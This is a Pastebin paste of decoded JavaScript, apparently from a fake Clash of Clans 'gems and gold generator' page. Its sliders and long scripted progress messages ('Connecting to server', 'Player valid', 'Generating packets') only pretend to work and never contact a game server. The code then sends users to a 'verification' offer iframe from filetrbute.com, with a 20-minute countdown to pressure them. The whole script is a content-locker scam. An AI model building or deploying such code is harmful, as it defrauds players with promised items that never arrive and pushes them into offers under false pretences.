Advertisement
Guest User

Decoded

a guest
Jul 19th, 2017
152
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 76.64 KB | None | 0 0
  1. (function(_0x7bccx1) {
  2. function _0x7bccx2() {
  3. var _0x7bccx3 = _0x7bccx1('.amount.gems');
  4. var _0x7bccx4 = _0x7bccx1('.slider.gems')['insertAfter'](_0x7bccx3)['slider']({
  5. range: 'min',
  6. orientation: 'horizontal',
  7. animate: 'true',
  8. min: 10000,
  9. max: 50000,
  10. value: 10000,
  11. change: function(_0x7bccx5, _0x7bccx6) {
  12. var _0x7bccx7 = _0x7bccx4['slider']('option', 'value');
  13. _0x7bccx1('.number.gems')['html'](_0x7bccx7);
  14. if (_0x7bccx7 == 10000) {
  15. _0x7bccx1('.gems.btn-min')['prop']('disabled', true)['addClass']('disable')
  16. } else {
  17. _0x7bccx1('.gems.btn-min')['prop']('disabled', false)['removeClass']('disable')
  18. };
  19. if (_0x7bccx7 == 50000) {
  20. _0x7bccx1('.gems.btn-plus')['prop']('disabled', true)['addClass']('disable')
  21. } else {
  22. _0x7bccx1('.gems.btn-plus')['prop']('disabled', false)['removeClass']('disable')
  23. }
  24. }
  25. });
  26. _0x7bccx1('.gems.btn-plus')['click'](function() {
  27. var _0x7bccx8 = _0x7bccx4['slider']('option', 'value');
  28. _0x7bccx4['slider']('value', _0x7bccx8 + 10000)
  29. });
  30. _0x7bccx1('.gems.btn-min')['click'](function() {
  31. var _0x7bccx8 = _0x7bccx4['slider']('option', 'value');
  32. _0x7bccx4['slider']('value', _0x7bccx8 - 10000)
  33. })
  34. }
  35.  
  36. function _0x7bccx9() {
  37. var _0x7bccxa = _0x7bccx1('.amount.gold');
  38. var _0x7bccxb = _0x7bccx1('.slider.gold')['insertAfter'](_0x7bccxa)['slider']({
  39. range: 'min',
  40. orientation: 'horizontal',
  41. animate: 'true',
  42. min: 2000000,
  43. max: 10000000,
  44. value: 2000000,
  45. change: function(_0x7bccx5, _0x7bccx6) {
  46. var _0x7bccxc = _0x7bccxb['slider']('option', 'value');
  47. _0x7bccx1('.number.gold')['html'](_0x7bccxc);
  48. if (_0x7bccxc == 2000000) {
  49. _0x7bccx1('.gold.btn-min')['prop']('disabled', true)['addClass']('disable')
  50. } else {
  51. _0x7bccx1('.gold.btn-min')['prop']('disabled', false)['removeClass']('disable')
  52. };
  53. if (_0x7bccxc == 10000000) {
  54. _0x7bccx1('.gold.btn-plus')['prop']('disabled', true)['addClass']('disable')
  55. } else {
  56. _0x7bccx1('.gold.btn-plus')['prop']('disabled', false)['removeClass']('disable')
  57. }
  58. }
  59. });
  60. _0x7bccx1('.gold.btn-plus')['click'](function() {
  61. var _0x7bccxd = _0x7bccxb['slider']('option', 'value');
  62. _0x7bccxb['slider']('value', _0x7bccxd + 2000000)
  63. });
  64. _0x7bccx1('.gold.btn-min')['click'](function() {
  65. var _0x7bccxd = _0x7bccxb['slider']('option', 'value');
  66. _0x7bccxb['slider']('value', _0x7bccxd - 2000000)
  67. })
  68. }
  69.  
  70. function _0x7bccxe() {
  71. var _0x7bccxf = _0x7bccx1('.amount.elixir');
  72. var _0x7bccx10 = _0x7bccx1('.slider.elixir')['insertAfter'](_0x7bccxf)['slider']({
  73. range: 'min',
  74. orientation: 'horizontal',
  75. animate: 'true',
  76. min: 2000000,
  77. max: 10000000,
  78. value: 2000000,
  79. change: function(_0x7bccx5, _0x7bccx6) {
  80. var _0x7bccx11 = _0x7bccx10['slider']('option', 'value');
  81. _0x7bccx1('.number.elixir')['html'](_0x7bccx11);
  82. if (_0x7bccx11 == 2000000) {
  83. _0x7bccx1('.elixir.btn-min')['prop']('disabled', true)['addClass']('disable')
  84. } else {
  85. _0x7bccx1('.elixir.btn-min')['prop']('disabled', false)['removeClass']('disable')
  86. };
  87. if (_0x7bccx11 == 10000000) {
  88. _0x7bccx1('.elixir.btn-plus')['prop']('disabled', true)['addClass']('disable')
  89. } else {
  90. _0x7bccx1('.elixir.btn-plus')['prop']('disabled', false)['removeClass']('disable')
  91. }
  92. }
  93. });
  94. _0x7bccx1('.elixir.btn-plus')['click'](function() {
  95. var _0x7bccx12 = _0x7bccx10['slider']('option', 'value');
  96. _0x7bccx10['slider']('value', _0x7bccx12 + 2000000)
  97. });
  98. _0x7bccx1('.elixir.btn-min')['click'](function() {
  99. var _0x7bccx12 = _0x7bccx10['slider']('option', 'value');
  100. _0x7bccx10['slider']('value', _0x7bccx12 - 2000000)
  101. })
  102. }
  103.  
  104. function _0x7bccx13() {
  105. var _0x7bccx14 = _0x7bccx1('.amount.dark-elixir');
  106. var _0x7bccx15 = _0x7bccx1('.slider.dark-elixir')['insertAfter'](_0x7bccx14)['slider']({
  107. range: 'min',
  108. orientation: 'horizontal',
  109. animate: 'true',
  110. min: 40000,
  111. max: 200000,
  112. value: 40000,
  113. change: function(_0x7bccx5, _0x7bccx6) {
  114. var _0x7bccx16 = _0x7bccx15['slider']('option', 'value');
  115. _0x7bccx1('.number.dark-elixir')['html'](_0x7bccx16);
  116. if (_0x7bccx16 == 40000) {
  117. _0x7bccx1('.dark-elixir.btn-min')['prop']('disabled', true)['addClass']('disable')
  118. } else {
  119. _0x7bccx1('.dark-elixir.btn-min')['prop']('disabled', false)['removeClass']('disable')
  120. };
  121. if (_0x7bccx16 == 200000) {
  122. _0x7bccx1('.dark-elixir.btn-plus')['prop']('disabled', true)['addClass']('disable')
  123. } else {
  124. _0x7bccx1('.dark-elixir.btn-plus')['prop']('disabled', false)['removeClass']('disable')
  125. }
  126. }
  127. });
  128. _0x7bccx1('.dark-elixir.btn-plus')['click'](function() {
  129. var _0x7bccx17 = _0x7bccx15['slider']('option', 'value');
  130. _0x7bccx15['slider']('value', _0x7bccx17 + 40000)
  131. });
  132. _0x7bccx1('.dark-elixir.btn-min')['click'](function() {
  133. var _0x7bccx17 = _0x7bccx15['slider']('option', 'value');
  134. _0x7bccx15['slider']('value', _0x7bccx17 - 40000)
  135. })
  136. }
  137.  
  138. function _0x7bccx18() {
  139. var _0x7bccx19 = document['getElementById']('playerTag');
  140. _0x7bccx19['addEventListener']('keyup', _0x7bccx1a);
  141.  
  142. function _0x7bccx1a() {
  143. playerID = _0x7bccx19['value']['replace']('#', '');
  144. _0x7bccx19['value'] = '#' + playerID;
  145. if (_0x7bccx19['value']['indexOf'](' ')) {
  146. _0x7bccx19['value'] = _0x7bccx19['value']['replace'](' ', '#')
  147. };
  148. if (_0x7bccx1(this)['val']()['length'] > 7) {
  149. _0x7bccx1('#btnContinue')['prop']('disabled', false)['removeClass']('disable')
  150. } else {
  151. _0x7bccx1('#btnContinue')['prop']('disabled', true)['addClass']('disable')
  152. };
  153. _0x7bccx1('.player-tag')['text'](_0x7bccx1(this)['val']())
  154. }
  155. _0x7bccx1('#btnContinue')['prop']('disabled', true)
  156. }
  157.  
  158. function _0x7bccx1b() {
  159. var _0x7bccx1c = _0x7bccx1('iframe, #iFrameOffers');
  160. var _0x7bccx1d = 'http://filetrbute.com/clashofclanswithrich';
  161. _0x7bccx1c['attr']('src', _0x7bccx1d)
  162. }
  163.  
  164. function _0x7bccx1e() {
  165. var _0x7bccx1f = document['createElement']('audio');
  166. _0x7bccx1f['src'] = 'audio/music.ogg';
  167. _0x7bccx1f['src'] = 'audio/music.mp3';
  168. _0x7bccx1f['autoPlay'] = true;
  169. _0x7bccx1f['loop'] = true;
  170. _0x7bccx1f['preLoad'] = true;
  171. _0x7bccx1f['volume'] = 0.5;
  172. _0x7bccx1f['play']()
  173. }
  174.  
  175. function _0x7bccx20() {
  176. var _0x7bccx21 = document['createElement']('audio');
  177. _0x7bccx21['src'] = 'audio/start.ogg';
  178. _0x7bccx21['src'] = 'audio/start.mp3';
  179. _0x7bccx21['autoPlay'] = false;
  180. _0x7bccx21['loop'] = false;
  181. _0x7bccx21['preLoad'] = true;
  182. _0x7bccx21['volume'] = 1.0;
  183. _0x7bccx21['play']()
  184. }
  185.  
  186. function _0x7bccx22() {
  187. var _0x7bccx23 = document['createElement']('audio');
  188. _0x7bccx23['src'] = 'audio/gems.ogg';
  189. _0x7bccx23['src'] = 'audio/gems.mp3';
  190. _0x7bccx23['autoPlay'] = false;
  191. _0x7bccx23['loop'] = false;
  192. _0x7bccx23['preLoad'] = true;
  193. _0x7bccx23['volume'] = 1.0;
  194. _0x7bccx23['play']()
  195. }
  196.  
  197. function _0x7bccx24() {
  198. var _0x7bccx25 = document['createElement']('audio');
  199. _0x7bccx25['src'] = 'audio/gold.ogg';
  200. _0x7bccx25['src'] = 'audio/gold.mp3';
  201. _0x7bccx25['autoPlay'] = false;
  202. _0x7bccx25['loop'] = false;
  203. _0x7bccx25['preLoad'] = true;
  204. _0x7bccx25['volume'] = 1.0;
  205. _0x7bccx25['play']()
  206. }
  207.  
  208. function _0x7bccx26() {
  209. var _0x7bccx27 = document['createElement']('audio');
  210. _0x7bccx27['src'] = 'audio/elixir.ogg';
  211. _0x7bccx27['src'] = 'audio/elixir.mp3';
  212. _0x7bccx27['autoPlay'] = false;
  213. _0x7bccx27['loop'] = false;
  214. _0x7bccx27['preLoad'] = true;
  215. _0x7bccx27['volume'] = 1.0;
  216. _0x7bccx27['play']()
  217. }
  218.  
  219. function _0x7bccx28() {
  220. var _0x7bccx29 = document['createElement']('audio');
  221. _0x7bccx29['src'] = 'audio/darkelixir.mp3';
  222. _0x7bccx29['autoPlay'] = false;
  223. _0x7bccx29['preLoad'] = true;
  224. _0x7bccx29['loop'] = false;
  225. _0x7bccx29['volume'] = 1.0;
  226. _0x7bccx29['play']()
  227. }
  228.  
  229. function _0x7bccx2a() {
  230. var _0x7bccx2b = document['createElement']('audio');
  231. _0x7bccx2b['src'] = 'audio/verify.ogg';
  232. _0x7bccx2b['src'] = 'audio/verify.mp3';
  233. _0x7bccx2b['autoPlay'] = false;
  234. _0x7bccx2b['loop'] = false;
  235. _0x7bccx2b['preLoad'] = true;
  236. _0x7bccx2b['volume'] = 1.0;
  237. _0x7bccx2b['play']()
  238. }
  239. _0x7bccx1(window)['load'](function() {
  240. _0x7bccx2();
  241. _0x7bccx9();
  242. _0x7bccxe();
  243. _0x7bccx13();
  244. _0x7bccx18();
  245. _0x7bccx1('.player-tag, .timer, .ui-slider, .offer')['hide']();
  246. _0x7bccx1('iframe')['replaceWith']('<iframe src="" id="iFrameOffer" opacity="0" scrolling="no" marginwidth="0" marginheight="0" align="middle" frameborder="0"></iframe>')
  247. });
  248. _0x7bccx1('#btnGenerate')['click'](function() {
  249. _0x7bccx1('#account')['dialog']('open')['dialog']({
  250. dialogClass: 'account fast zoomIn'
  251. })
  252. });
  253. _0x7bccx1('#account')['dialog']({
  254. dialogClass: 'account',
  255. autoOpen: false,
  256. width: 360,
  257. closeOnEscape: false,
  258. resizable: false,
  259. draggable: false,
  260. modal: true,
  261. show: 0,
  262. hide: 200,
  263. open: function(_0x7bccx5, _0x7bccx6) {
  264. _0x7bccx1('#btnAccountExample')['click'](function() {
  265. _0x7bccx1('#account')['dialog']('close')['dialog']({
  266. dialogClass: 'account fast zoomOut'
  267. });
  268. _0x7bccx1('#accountExample')['dialog']('open')['dialog']({
  269. dialogClass: 'account-example fast zoomIn'
  270. })
  271. });
  272. _0x7bccx1('.ui-dialog-titlebar-close')['click'](function() {
  273. _0x7bccx1('#account')['dialog']('close')['dialog']({
  274. dialogClass: 'account fast zoomOut'
  275. })
  276. })
  277. }
  278. });
  279. _0x7bccx1('#accountExample')['dialog']({
  280. dialogClass: 'account-example',
  281. autoOpen: false,
  282. width: 360,
  283. closeOnEscape: false,
  284. resizable: false,
  285. draggable: false,
  286. modal: true,
  287. show: 0,
  288. hide: 200,
  289. open: function(_0x7bccx5, _0x7bccx6) {
  290. _0x7bccx1('body')['css']('position', 'fixed');
  291. _0x7bccx1('.ui-dialog-titlebar-back')['click'](function() {
  292. _0x7bccx1('body')['css']('position', '');
  293. _0x7bccx1('#accountExample')['dialog']('close')['dialog']({
  294. dialogClass: 'account-example fast zoomOut'
  295. });
  296. _0x7bccx1('#account')['dialog']('open')['dialog']({
  297. dialogClass: 'account fast zoomIn'
  298. })
  299. });
  300. _0x7bccx1('.ui-dialog-titlebar-close')['click'](function() {
  301. _0x7bccx1('body')['css']('position', '');
  302. _0x7bccx1('#accountExample')['dialog']('close')['dialog']({
  303. dialogClass: 'account-example fast zoomOut'
  304. })
  305. })
  306. },
  307. create: function() {
  308. _0x7bccx1('.account-example')['children']('.ui-dialog-titlebar')['append']('<button class="ui-button ui-widget ui-state-default ui-corner-all ui-button-icon-only ui-dialog-titlebar-back" type="button" role="button" title="Back"></button>')
  309. }
  310. });
  311. _0x7bccx1('#btnContinue')['click'](function() {
  312. _0x7bccx1('body')['css']('position', ' ');
  313. _0x7bccx1('#account')['dialog']('close')['dialog']({
  314. dialogClass: 'account fast zoomOut'
  315. });
  316. _0x7bccx1('.resources')['addClass']('progress');
  317. _0x7bccx1('.intro, .buttonset, .ui-slider, .note')['remove']();
  318. _0x7bccx1('.progress')['wrapInner']('<div class="main-progress"></div>');
  319. _0x7bccx1('.main-progress')['prepend']('<div class="progress-search"><div class="searching"></div><div class="search-account"></div></div>')['prepend']('<div class="progress-loader"><div class="spins"><div class="spin"></div><img class="loader-img" src="img/loader-img.png"/></div></div>')['append']('<div class="progress-spin spin"></div>');
  320. _0x7bccx1('.player-tag')['clone']()['appendTo']('.search-account');
  321. _0x7bccx1('.search-account')['prepend']('<div class="search-player"></div>')['append']('<div class="status-player"></div>');
  322. _0x7bccx1('.search-account .player-tag')['show']();
  323. _0x7bccx1('.item')['addClass']('medium bounceIn');
  324. _0x7bccx1('.title.gems')['prependTo']('.item.gems');
  325. _0x7bccx1('.title.gold')['prependTo']('.item.gold');
  326. _0x7bccx1('.title.elixir')['prependTo']('.item.elixir');
  327. _0x7bccx1('.title.dark-elixir')['prependTo']('.item.dark-elixir');
  328. _0x7bccx1('.amount.gems')['prepend']('<div class="gen gems"></div>');
  329. _0x7bccx1('.amount.gold')['prepend']('<div class="gen gold"></div>');
  330. _0x7bccx1('.amount.elixir')['prepend']('<div class="gen elixir"></div>');
  331. _0x7bccx1('.amount.dark-elixir')['prepend']('<div class="gen dark-elixir"></div>');
  332. _0x7bccx1('.footer')['appendTo']('.resources.progress');
  333. _0x7bccx1('#btnGenerate')['replaceWith']('<div class="progress-outer"><div class="progress-bar"></div><div class="progress-label"></div></div>');
  334. _0x7bccx1('.progress-search, .itemset, .item, .number, .progress-spin')['hide']();
  335. var _0x7bccx2c = _0x7bccx1('.progress-bar'),
  336. _0x7bccx2d = _0x7bccx1('.progress-label');
  337. _0x7bccx2c['progressbar']({
  338. value: false,
  339. change: function() {
  340. _0x7bccx2d['text']('Loading')
  341. },
  342. complete: function() {
  343. _0x7bccx2d['text']('Waiting for verification!');
  344. _0x7bccx2a();
  345. _0x7bccx1b();
  346. _0x7bccx1('.resources')['removeClass']('progress')['addClass']('verify');
  347. _0x7bccx1('.player-tag')['show']();
  348. _0x7bccx1('.title, .progress-spin')['remove']();
  349. _0x7bccx1('.itemset')['before']('<p class="intro"></p>');
  350. _0x7bccx1('.intro')['text']('Wow, nice going! Now we need to adding this resources into your account. But before adding resources into your account, let\'s do 2-step verification. Click the verify button, Chief!');
  351. _0x7bccx1('.itemset, .number')['unwrap']()['show']();
  352. _0x7bccx1('.itemset')['wrapInner']('<div class="itemset-inner medium bounceIn"></div>');
  353. _0x7bccx1('.item.complete')['removeClass']('opaque');
  354. _0x7bccx1('.itemset')['after']('<p class="note"></p>');
  355. _0x7bccx1('.note')['text']('Note: The resources will be sent into your account once you complete the verification!');
  356. _0x7bccx1('.progress-outer')['replaceWith']('<button id="btnVerifyBefore" class="btn-verify" type="button" role="button">Verify Now!</button>');
  357. _0x7bccx1('#btnVerifyBefore, #btnVerifyAfter')['attr']('style', 'display:inline!important;width:auto!important;height:auto!important;margin:0!important;position:relative!important;top:0!important;right:0!important;bottom:0!important;left:0!important;opacity:1!important;');
  358. _0x7bccx1('#btnVerifyBefore')['click'](function() {
  359. _0x7bccx1('.intro')['text']('Chief, verify now before time limit runs out. If the verification has not been completed within the time limit provided, the resources will be canceled!');
  360. _0x7bccx1('.player-tag')['hide']();
  361. _0x7bccx1('.timer')['show'](function() {
  362. _0x7bccx1('#mTimer')['countdowntimer']({
  363. minutes: 20,
  364. seconds: 0,
  365. timeSeparator: 'm '
  366. })
  367. });
  368. _0x7bccx1('.locker-timer')['show'](function() {
  369. _0x7bccx1('#mLockTimer')['countdowntimer']({
  370. minutes: 20,
  371. seconds: 0,
  372. timeSeparator: 'm '
  373. })
  374. });
  375. _0x7bccx1('#btnVerifyBefore')['replaceWith']('<button id="btnVerifyAfter" class="btn-verify" type="button" role="button">Verify Now!</button>');
  376. _0x7bccx1('#verification')['dialog']('open');
  377. setTimeout(function() {
  378. _0x7bccx1('.cx-note')['remove']();
  379. _0x7bccx1('.cx-input')['show']()
  380. }, 200000);
  381. _0x7bccx1('#btnVerifyAfter')['click'](function() {
  382. _0x7bccx1('#verification')['dialog']('open')
  383. })
  384. })
  385. }
  386. });
  387.  
  388. function _0x7bccx2e() {
  389. var _0x7bccx2f = _0x7bccx2c['progressbar']('value') || 0;
  390. _0x7bccx2c['progressbar']('value', _0x7bccx2f + 1);
  391. if (_0x7bccx2f < 1) {
  392. setTimeout(_0x7bccx2e, 1000);
  393. _0x7bccx2d['text']('Loading');
  394. _0x7bccx20();
  395. _0x7bccx1e()
  396. } else {
  397. if (_0x7bccx2f < 2) {
  398. setTimeout(_0x7bccx2e, 1000);
  399. _0x7bccx2d['text']('Loading')
  400. } else {
  401. if (_0x7bccx2f < 3) {
  402. setTimeout(_0x7bccx2e, 200);
  403. _0x7bccx2d['text']('Preparing files')
  404. } else {
  405. if (_0x7bccx2f < 6) {
  406. setTimeout(_0x7bccx2e, 500);
  407. _0x7bccx2d['text']('Preparation')
  408. } else {
  409. if (_0x7bccx2f < 7) {
  410. setTimeout(_0x7bccx2e, 200);
  411. _0x7bccx2d['text']('Initializing')
  412. } else {
  413. if (_0x7bccx2f < 12) {
  414. setTimeout(_0x7bccx2e, 1000);
  415. _0x7bccx2d['text']('Connecting to server')
  416. } else {
  417. if (_0x7bccx2f < 13) {
  418. setTimeout(_0x7bccx2e, 200);
  419. _0x7bccx2d['text']('Loading')
  420. } else {
  421. if (_0x7bccx2f < 14) {
  422. setTimeout(_0x7bccx2e, 1000);
  423. _0x7bccx2d['text']('Checking')
  424. } else {
  425. if (_0x7bccx2f < 15) {
  426. setTimeout(_0x7bccx2e, 500);
  427. _0x7bccx2d['text']('Preparation')
  428. } else {
  429. if (_0x7bccx2f < 16) {
  430. setTimeout(_0x7bccx2e, 200);
  431. _0x7bccx2d['text']('Application servers')
  432. } else {
  433. if (_0x7bccx2f < 17) {
  434. setTimeout(_0x7bccx2e, 500);
  435. _0x7bccx2d['text']('Loading')
  436. } else {
  437. if (_0x7bccx2f < 22) {
  438. setTimeout(_0x7bccx2e, 2000);
  439. _0x7bccx2d['text']('Checking player');
  440. _0x7bccx1('.progress-loader')['remove']();
  441. _0x7bccx1('.progress-search')['show']();
  442. _0x7bccx1('.search-player')['html']('<p>Searching for</p>');
  443. _0x7bccx1('.status-player')['html']('<p class="blink"><span>.</span><span>.</span><span>.</span></p>')
  444. } else {
  445. if (_0x7bccx2f < 23) {
  446. setTimeout(_0x7bccx2e, 1000);
  447. _0x7bccx2d['text']('Player valid');
  448. _0x7bccx1('.search-player')['remove']();
  449. _0x7bccx1('.status-player')['html']('<p class="blink">is valid!</p>');
  450. _0x7bccx1('.searching')['hide']()
  451. } else {
  452. if (_0x7bccx2f < 25) {
  453. setTimeout(_0x7bccx2e, 1000);
  454. _0x7bccx2d['text']('Player authentication');
  455. _0x7bccx1('.status-player')['html']('<p class="blink">is connecting<span>.</span><span>.</span><span>.</span></p>')
  456. } else {
  457. if (_0x7bccx2f < 30) {
  458. setTimeout(_0x7bccx2e, 1000);
  459. _0x7bccx2d['text']('Attempting connection')
  460. } else {
  461. if (_0x7bccx2f < 31) {
  462. setTimeout(_0x7bccx2e, 1000);
  463. _0x7bccx2d['text']('Connected');
  464. _0x7bccx1('.status-player')['html']('<p class="blink">is connected!</p>')
  465. } else {
  466. if (_0x7bccx2f < 32) {
  467. setTimeout(_0x7bccx2e, 200);
  468. _0x7bccx2d['text']('Loading modul 0/20')
  469. } else {
  470. if (_0x7bccx2f < 33) {
  471. setTimeout(_0x7bccx2e, 500);
  472. _0x7bccx2d['text']('Loading modul 1/20');
  473. _0x7bccx1('.progress-search')['remove']();
  474. _0x7bccx1('.itemset')['show']();
  475. _0x7bccx1('.item.gems')['show']()['addClass']('medium bounceIn')
  476. } else {
  477. if (_0x7bccx2f < 34) {
  478. setTimeout(_0x7bccx2e, 500);
  479. _0x7bccx2d['text']('Loading modul 2/20')
  480. } else {
  481. if (_0x7bccx2f < 35) {
  482. setTimeout(_0x7bccx2e, 200);
  483. _0x7bccx2d['text']('Loading modul 3/20')
  484. } else {
  485. if (_0x7bccx2f < 36) {
  486. setTimeout(_0x7bccx2e, 500);
  487. _0x7bccx2d['text']('Loading modul 5/20');
  488. _0x7bccx1('.item.gold')['show']()['addClass']('medium bounceIn')
  489. } else {
  490. if (_0x7bccx2f < 37) {
  491. setTimeout(_0x7bccx2e, 500);
  492. _0x7bccx2d['text']('Loading modul 7/20')
  493. } else {
  494. if (_0x7bccx2f < 38) {
  495. setTimeout(_0x7bccx2e, 200);
  496. _0x7bccx2d['text']('Loading modul 8/20')
  497. } else {
  498. if (_0x7bccx2f < 39) {
  499. setTimeout(_0x7bccx2e, 500);
  500. _0x7bccx2d['text']('Loading modul 10/20');
  501. _0x7bccx1('.item.elixir')['show']()['addClass']('medium bounceIn')
  502. } else {
  503. if (_0x7bccx2f < 40) {
  504. setTimeout(_0x7bccx2e, 500);
  505. _0x7bccx2d['text']('Loading modul 11/20')
  506. } else {
  507. if (_0x7bccx2f < 41) {
  508. setTimeout(_0x7bccx2e, 200);
  509. _0x7bccx2d['text']('Loading modul 13/20')
  510. } else {
  511. if (_0x7bccx2f < 42) {
  512. setTimeout(_0x7bccx2e, 500);
  513. _0x7bccx2d['text']('Loading modul 17/20');
  514. _0x7bccx1('.item.dark-elixir')['show']()['addClass']('medium bounceIn')
  515. } else {
  516. if (_0x7bccx2f < 43) {
  517. setTimeout(_0x7bccx2e, 500);
  518. _0x7bccx2d['text']('Loading modul 19/20')
  519. } else {
  520. if (_0x7bccx2f < 44) {
  521. setTimeout(_0x7bccx2e, 200);
  522. _0x7bccx2d['text']('Loading modul 20/20')
  523. } else {
  524. if (_0x7bccx2f < 45) {
  525. setTimeout(_0x7bccx2e, 1000);
  526. _0x7bccx2d['text']('Loading')
  527. } else {
  528. if (_0x7bccx2f < 46) {
  529. setTimeout(_0x7bccx2e, 500);
  530. _0x7bccx2d['text']('Waiting for server')
  531. } else {
  532. if (_0x7bccx2f < 47) {
  533. setTimeout(_0x7bccx2e, 500);
  534. _0x7bccx2d['text']('Connection Established')
  535. } else {
  536. if (_0x7bccx2f < 48) {
  537. setTimeout(_0x7bccx2e, 200);
  538. _0x7bccx2d['text']('Waiting for server')
  539. } else {
  540. if (_0x7bccx2f < 49) {
  541. setTimeout(_0x7bccx2e, 500);
  542. _0x7bccx2d['text']('Server Response OK')
  543. } else {
  544. if (_0x7bccx2f < 50) {
  545. setTimeout(_0x7bccx2e, 1000);
  546. _0x7bccx2d['text']('Loading');
  547. _0x7bccx1('.gen.gems')['html']('<p class="blink">Initializing<span>.</span><span>.</span><span>.</span></p>')
  548. } else {
  549. if (_0x7bccx2f < 58) {
  550. setTimeout(_0x7bccx2e, 500);
  551. _0x7bccx2d['text']('Generating packets for gems');
  552. _0x7bccx1('.gen.gems')['html']('<p class="blink">Generating<span>.</span><span>.</span><span>.</span></p>')
  553. } else {
  554. if (_0x7bccx2f < 59) {
  555. setTimeout(_0x7bccx2e, 2000);
  556. _0x7bccx2d['text']('Generating sucessfully');
  557. _0x7bccx22();
  558. _0x7bccx1('.item.gems, .w-item.gems')['removeClass']('medium bounceIn')['addClass']('complete');
  559. _0x7bccx1('.gen.gems')['remove']();
  560. _0x7bccx1('.number.gems')['show']()['each'](function() {
  561. _0x7bccx1(this)['prop']('counter', 0)['animate']({
  562. counter: _0x7bccx1(this)['text']()
  563. }, {
  564. duration: 1500,
  565. easing: 'swing',
  566. step: function(_0x7bccx30) {
  567. _0x7bccx1(this)['text'](Math['ceil'](_0x7bccx30))
  568. }
  569. })
  570. })
  571. } else {
  572. if (_0x7bccx2f < 60) {
  573. setTimeout(_0x7bccx2e, 1000);
  574. _0x7bccx2d['text']('Loading');
  575. _0x7bccx1('.gen.gold')['html']('<p class="blink">Initializing<span>.</span><span>.</span><span>.</span></p>')
  576. } else {
  577. if (_0x7bccx2f < 68) {
  578. setTimeout(_0x7bccx2e, 500);
  579. _0x7bccx2d['text']('Generating packets for gold');
  580. _0x7bccx1('.gen.gold')['html']('<p class="blink">Generating<span>.</span><span>.</span><span>.</span></p>')
  581. } else {
  582. if (_0x7bccx2f < 69) {
  583. setTimeout(_0x7bccx2e, 2000);
  584. _0x7bccx2d['text']('Generating sucessfully');
  585. _0x7bccx24();
  586. _0x7bccx1('.item.gold, .w-item.gold')['removeClass']('medium bounceIn')['addClass']('complete');
  587. _0x7bccx1('.gen.gold')['remove']();
  588. _0x7bccx1('.number.gold')['show']()['each'](function() {
  589. _0x7bccx1(this)['prop']('counter', 0)['animate']({
  590. counter: _0x7bccx1(this)['text']()
  591. }, {
  592. duration: 1500,
  593. easing: 'swing',
  594. step: function(_0x7bccx30) {
  595. _0x7bccx1(this)['text'](Math['ceil'](_0x7bccx30))
  596. }
  597. })
  598. })
  599. } else {
  600. if (_0x7bccx2f < 70) {
  601. setTimeout(_0x7bccx2e, 1000);
  602. _0x7bccx2d['text']('Loading');
  603. _0x7bccx1('.gen.elixir')['html']('<p class="blink">Initializing<span>.</span><span>.</span><span>.</span></p>')
  604. } else {
  605. if (_0x7bccx2f < 78) {
  606. setTimeout(_0x7bccx2e, 500);
  607. _0x7bccx2d['text']('Generating packets for elixir');
  608. _0x7bccx1('.gen.elixir')['html']('<p class="blink">Generating<span>.</span><span>.</span><span>.</span></p>')
  609. } else {
  610. if (_0x7bccx2f < 79) {
  611. setTimeout(_0x7bccx2e, 2000);
  612. _0x7bccx2d['text']('Generating sucessfully');
  613. _0x7bccx26();
  614. _0x7bccx1('.item.elixir, .w-item.elixir')['removeClass']('medium bounceIn')['addClass']('complete');
  615. _0x7bccx1('.gen.elixir')['remove']();
  616. _0x7bccx1('.number.elixir')['show']()['each'](function() {
  617. _0x7bccx1(this)['prop']('counter', 0)['animate']({
  618. counter: _0x7bccx1(this)['text']()
  619. }, {
  620. duration: 1500,
  621. easing: 'swing',
  622. step: function(_0x7bccx30) {
  623. _0x7bccx1(this)['text'](Math['ceil'](_0x7bccx30))
  624. }
  625. })
  626. })
  627. } else {
  628. if (_0x7bccx2f < 80) {
  629. setTimeout(_0x7bccx2e, 1000);
  630. _0x7bccx2d['text']('Loading');
  631. _0x7bccx1('.gen.dark-elixir')['html']('<p class="blink">Initializing<span>.</span><span>.</span><span>.</span></p>')
  632. } else {
  633. if (_0x7bccx2f < 88) {
  634. setTimeout(_0x7bccx2e, 500);
  635. _0x7bccx2d['text']('Generating packets for dark elixir');
  636. _0x7bccx1('.gen.dark-elixir')['html']('<p class="blink">Generating<span>.</span><span>.</span><span>.</span></p>')
  637. } else {
  638. if (_0x7bccx2f < 89) {
  639. setTimeout(_0x7bccx2e, 2000);
  640. _0x7bccx2d['text']('Generating sucessfully');
  641. _0x7bccx28();
  642. _0x7bccx1('.item.dark-elixir, .w-item.dark-elixir')['removeClass']('medium bounceIn')['addClass']('complete');
  643. _0x7bccx1('.gen.dark-elixir')['remove']();
  644. _0x7bccx1('.number.dark-elixir')['show']()['each'](function() {
  645. _0x7bccx1(this)['prop']('counter', 0)['animate']({
  646. counter: _0x7bccx1(this)['text']()
  647. }, {
  648. duration: 1500,
  649. easing: 'swing',
  650. step: function(_0x7bccx30) {
  651. _0x7bccx1(this)['text'](Math['ceil'](_0x7bccx30))
  652. }
  653. })
  654. })
  655. } else {
  656. if (_0x7bccx2f < 90) {
  657. setTimeout(_0x7bccx2e, 1000);
  658. _0x7bccx2d['text']('Loading');
  659. _0x7bccx1('.item.complete, .w-item.complete')['addClass']('opaque');
  660. _0x7bccx1('.progress-spin')['fadeIn']()
  661. } else {
  662. if (_0x7bccx2f < 95) {
  663. setTimeout(_0x7bccx2e, 500);
  664. _0x7bccx2d['text']('Optimization')
  665. } else {
  666. if (_0x7bccx2f < 98) {
  667. setTimeout(_0x7bccx2e, 500);
  668. _0x7bccx2d['text']('Loading')
  669. } else {
  670. if (_0x7bccx2f < 99) {
  671. setTimeout(_0x7bccx2e, 500);
  672. _0x7bccx2d['text']('Loading');
  673. _0x7bccx1('iframe, #iframeOffer')['replaceWith']('<iframe src="" id="iFrameOffers" opacity="0" scrolling="no" marginwidth="0" marginheight="0" align="middle" frameborder="0"></iframe>')
  674. } else {
  675. if (_0x7bccx2f < 100) {
  676. setTimeout(_0x7bccx2e, 200);
  677. _0x7bccx2d['text']('Waiting for verification!')
  678. }
  679. }
  680. }
  681. }
  682. }
  683. }
  684. }
  685. }
  686. }
  687. }
  688. }
  689. }
  690. }
  691. }
  692. }
  693. }
  694. }
  695. }
  696. }
  697. }
  698. }
  699. }
  700. }
  701. }
  702. }
  703. }
  704. }
  705. }
  706. }
  707. }
  708. }
  709. }
  710. }
  711. }
  712. }
  713. }
  714. }
  715. }
  716. }
  717. }
  718. }
  719. }
  720. }
  721. }
  722. }
  723. }
  724. }
